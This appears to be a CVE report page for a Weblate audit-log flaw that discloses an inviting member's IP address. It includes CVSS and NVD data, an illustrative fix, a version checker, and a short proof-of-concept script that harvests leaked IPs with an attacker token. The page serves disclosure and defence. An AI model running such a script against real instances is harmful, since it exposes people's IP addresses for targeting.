Security Vulnerability Report
CVE-2025-64326 CVSS 2.6 LOW


Published: 2025-11-06 21:15:44
Last Modified: 2025-12-04 21:35:39

Description

Weblate is a web-based localization tool. In versions 5.14 and below, Weblate leaks the IP address of the project member who invited a user to a project in the audit log: audit entries created by admin-triggered actions carry the acting admin's client IP address, and those entries can be viewed by the invited user. This issue is fixed in version 5.14.1. NVD classifies the weakness as CWE-212 (Improper Removal of Sensitive Information Before Storage or Transfer).
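The flaw in miniature, as an added example that is not Weblate's code: a per-user audit log where an admin action (the invitation) is written to the target user's log together with the admin's request metadata, next to one way to avoid the leak. All names here (User, AuditEntry, record_invitation_vulnerable, record_invitation_fixed, the sample address 203.0.113.7) are hypothetical; Weblate's real models, views and patch differ.

```python
# Added example, not Weblate's code: a minimal model of a per-user audit log
# showing the CWE-212 flaw behind CVE-2025-64326 next to one possible fix.
# All names here (User, AuditEntry, record_invitation_*) are hypothetical;
# Weblate's real models, views and patch differ.
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Set


@dataclass
class User:
    username: str
    audit_log: List["AuditEntry"] = field(default_factory=list)


@dataclass(frozen=True)
class AuditEntry:
    activity: str            # e.g. "invited"
    actor: str               # username that performed the action
    address: Optional[str]   # client IP stored with the entry; None = not stored
    user_agent: str


def record_invitation_vulnerable(inviter: User, invitee: User,
                                 request_ip: str, user_agent: str) -> None:
    """Flawed pattern: the event lands in the invitee's log together with
    the *inviter's* request metadata, so the invitee later reads the
    inviter's IP address on their own audit-log page."""
    invitee.audit_log.append(
        AuditEntry("invited", inviter.username, request_ip, user_agent))


def record_invitation_fixed(inviter: User, invitee: User,
                            request_ip: str, user_agent: str) -> None:
    """One fix: an entry written to another user's log by an admin action
    carries no request metadata. The inviter's own log keeps the address,
    so the action stays attributable to the inviter."""
    invitee.audit_log.append(AuditEntry("invited", inviter.username, None, ""))
    inviter.audit_log.append(
        AuditEntry("invite-sent", inviter.username, request_ip, user_agent))


def addresses_visible_to(user: User) -> Set[str]:
    """Every IP address the audit-log page of `user` would display."""
    return {e.address for e in user.audit_log if e.address is not None}


def run_scenario(record: Callable[[User, User, str, str], None]) -> Dict[str, Set[str]]:
    """Replay one invitation with constructed sample data and report what
    each side can see afterwards."""
    admin = User("alice")
    guest = User("bob")
    inviter_ip = "203.0.113.7"                 # constructed sample address
    record(admin, guest, inviter_ip, "Mozilla/5.0 (constructed UA)")
    return {
        "inviter_ip": {inviter_ip},
        "invitee_sees": addresses_visible_to(guest),
        "inviter_sees": addresses_visible_to(admin),
    }


if __name__ == "__main__":
    for name, fn in (("vulnerable", record_invitation_vulnerable),
                     ("fixed", record_invitation_fixed)):
        result = run_scenario(fn)
        leaked = result["inviter_ip"] <= result["invitee_sees"]
        print(f"{name}: invitee sees {sorted(result['invitee_sees'])}; "
              f"inviter IP leaked={leaked}")
```

The point of the split is that request metadata (address, user agent) belongs to the actor's record, not the record of whoever the action happened to; any audit design that stores request context alongside "events about user X" needs to ask who will later be allowed to read X's log.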

CVSS Details

CVSS Score
2.6
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

The 2.6 score is the GitHub advisory (Secondary) assessment, which rates Attack Complexity as High. NVD's Primary assessment uses the same vector with AC:L (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N) and scores it 3.5, still LOW. The only impact component is a Low confidentiality loss: the inviting member's client IP address is disclosed to the invited user; there is no integrity or availability impact.

Configurations (Affected Products)

cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:* - VULNERABLE
Weblate < 5.14.1
Weblate 5.14
Weblate 5.13.x
Weblate 5.12.x
Weblate 5.11.x and earlier
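A practitioner checking a fleet wants the "< 5.14.1" range applied mechanically rather than by eye, including pre-release builds such as 5.14.1rc1 that sort before the fix. The following is an added example, not part of the advisory or of Weblate: it evaluates a version string against the cpeMatch block copied from the NVD record on this page. The helper names (version_key, compare, cpe_matches, is_affected) and the version strings tried in __main__ are my own; only plain OR nodes are handled.

```python
# Added example, not part of the advisory or of Weblate: check an installed
# Weblate version against the NVD configuration block for CVE-2025-64326.
# The cpeMatch entry is copied from the NVD record on this page; the
# version strings in __main__ are constructed samples.
import json
import re
from typing import Tuple

NVD_CONFIGURATIONS = json.loads("""
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
  {"vulnerable": true,
   "criteria": "cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:*",
   "versionEndExcluding": "5.14.1",
   "matchCriteriaId": "FDF3215A-26DE-48CD-9D80-DAFBBF1105B6"}]}]}]
""")

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(.*)$")


def version_key(version: str) -> Tuple[Tuple[int, ...], bool]:
    """Split '5.14.1rc1' into ((5, 14, 1), False): numeric parts plus a flag
    that is True only for a final release. Any suffix (rc1, b2, .dev0) is
    treated as a pre-release of that number, which sorts *before* the
    release, so '5.14.1rc1' still counts as < 5.14.1."""
    m = _VERSION_RE.match(version.strip())
    if not m or not m.group(1):
        raise ValueError(f"unparseable version: {version!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    return nums, m.group(2) == ""


def compare(a: str, b: str) -> int:
    """-1, 0 or 1 like the old cmp(); missing parts are zero, so
    '5.14' == '5.14.0'."""
    na, fa = version_key(a)
    nb, fb = version_key(b)
    width = max(len(na), len(nb))
    ka = na + (0,) * (width - len(na)) + (int(fa),)
    kb = nb + (0,) * (width - len(nb)) + (int(fb),)
    return (ka > kb) - (ka < kb)


def cpe_matches(version: str, match: dict, vendor: str, product: str) -> bool:
    """Does one cpeMatch entry cover `version` of vendor:product?"""
    f = match["criteria"].split(":")          # cpe:2.3:part:vendor:product:version:...
    if (f[3], f[4]) != (vendor, product):
        return False
    if f[5] != "*" and compare(version, f[5]) != 0:   # exact-version CPE
        return False
    bounds = (("versionStartIncluding", lambda c: c >= 0),
              ("versionStartExcluding", lambda c: c > 0),
              ("versionEndIncluding", lambda c: c <= 0),
              ("versionEndExcluding", lambda c: c < 0))
    return all(ok(compare(version, match[k])) for k, ok in bounds if k in match)


def is_affected(version: str, configurations=NVD_CONFIGURATIONS,
                vendor: str = "weblate", product: str = "weblate") -> bool:
    """True if any node marks `version` as vulnerable. Only the plain OR
    nodes this record uses are handled; AND/negated nodes raise so they are
    not silently misjudged."""
    for config in configurations:
        for node in config["nodes"]:
            if node.get("operator") != "OR" or node.get("negate"):
                raise NotImplementedError("only plain OR nodes are handled here")
            if any(m.get("vulnerable") and cpe_matches(version, m, vendor, product)
                   for m in node.get("cpeMatch", [])):
                return True
    return False


if __name__ == "__main__":
    for v in ("5.11.2", "5.13", "5.14", "5.14.1rc1", "5.14.1", "5.15"):
        print(f"Weblate {v:<10} affected={is_affected(v)}")
```

The pre-release handling is the part worth copying: a naive numeric comparison would treat 5.14.1rc1 as 5.14.1 and report a still-vulnerable release candidate as fixed.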

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64326 PoC - Weblate IP Address Disclosure in Audit Log
# This PoC demonstrates the information disclosure vulnerability.
#
# Caveats before running this: the project-level audit endpoint and the
# field names read below (results, ip_address, action, user, timestamp) are
# the PoC author's assumptions, not a documented Weblate REST API route; the
# advisory only states that the invited user can see the inviter's IP
# address in the audit log. Weblate's REST API authenticates with
# "Authorization: Token <key>", so the header below uses that scheme.
import requests

TARGET_URL = "https://vulnerable-weblate-instance.com"
ATTACKER_TOKEN = "attacker_user_token"
PROJECT_SLUG = "target_project"


def exploit_ip_disclosure():
    """
    Steps to exploit CVE-2025-64326:
    1. Attacker receives invitation to a project
    2. Attacker authenticates and views audit log
    3. Attacker extracts inviter's IP address from audit entries
    """
    headers = {
        "Authorization": f"Token {ATTACKER_TOKEN}",
        "Accept": "application/json",
    }

    # Step 1: View audit log (requires invitation acceptance)
    audit_url = f"{TARGET_URL}/api/projects/{PROJECT_SLUG}/audit/"
    response = requests.get(audit_url, headers=headers, timeout=15)
    if response.status_code != 200:
        print(f"[-] Failed to access audit log: {response.status_code}")
        return []

    audit_data = response.json()
    print("[+] Successfully accessed audit log")

    # Step 2: Extract IP addresses from audit entries
    leaked_ips = []
    for entry in audit_data.get("results", []):
        if "ip_address" not in entry:
            continue
        ip = entry["ip_address"]
        action = entry.get("action", "unknown")
        user_field = entry.get("user") or {}
        # tolerate either a nested user object or a bare username string
        if isinstance(user_field, dict):
            user = user_field.get("username", "unknown")
        else:
            user = str(user_field)
        leaked_ips.append({
            "ip": ip,
            "action": action,
            "user": user,
            "timestamp": entry.get("timestamp"),
        })
        print(f"[+] Leaked IP: {ip} (User: {user}, Action: {action})")
    return leaked_ips


def main():
    print("=" * 60)
    print("CVE-2025-64326 - Weblate Audit Log IP Disclosure PoC")
    print("=" * 60)
    leaked_ips = exploit_ip_disclosure()
    if leaked_ips:
        print(f"\n[!] Successfully extracted {len(leaked_ips)} IP address(es)")
        print("[!] These IPs can be used for geolocation or targeted attacks")
    else:
        print("\n[-] No IP addresses found or access denied")


if __name__ == "__main__":
    main()

References

https://github.com/WeblateOrg/weblate/security/advisories/GHSA-gr35-vpx2-qxhc (Patch, Vendor Advisory)
https://github.com/WeblateOrg/weblate/pull/16781 (Issue Tracking)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64326", "sourceIdentifier": "[email protected]", "published": "2025-11-06T21:15:43.957", "lastModified": "2025-12-04T21:35:38.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Weblate is a web based localization tool. In versions 5.14 and below, Weblate leaks the IP address of the project member inviting the user to the project in the audit log. The audit log includes IP addresses from admin-triggered actions, which can be viewed by invited users. This issue is fixed in version 5.14.1."}, {"lang": "es", "value": "Weblate es una herramienta de localización basada en web. En las versiones 5.14 e inferiores, Weblate filtra la dirección IP del miembro del proyecto que invita al usuario al proyecto en el registro de auditoría. El registro de auditoría incluye direcciones IP de acciones iniciadas por administradores, que pueden ser vistas por los usuarios invitados. Este problema está solucionado en la versión 5.14.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", 
"type": "Secondary", "description": [{"lang": "en", "value": "CWE-212"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.14.1", "matchCriteriaId": "FDF3215A-26DE-48CD-9D80-DAFBBF1105B6"}]}]}], "references": [{"url": "https://github.com/WeblateOrg/weblate/pull/16781", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/WeblateOrg/weblate/security/advisories/GHSA-gr35-vpx2-qxhc", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}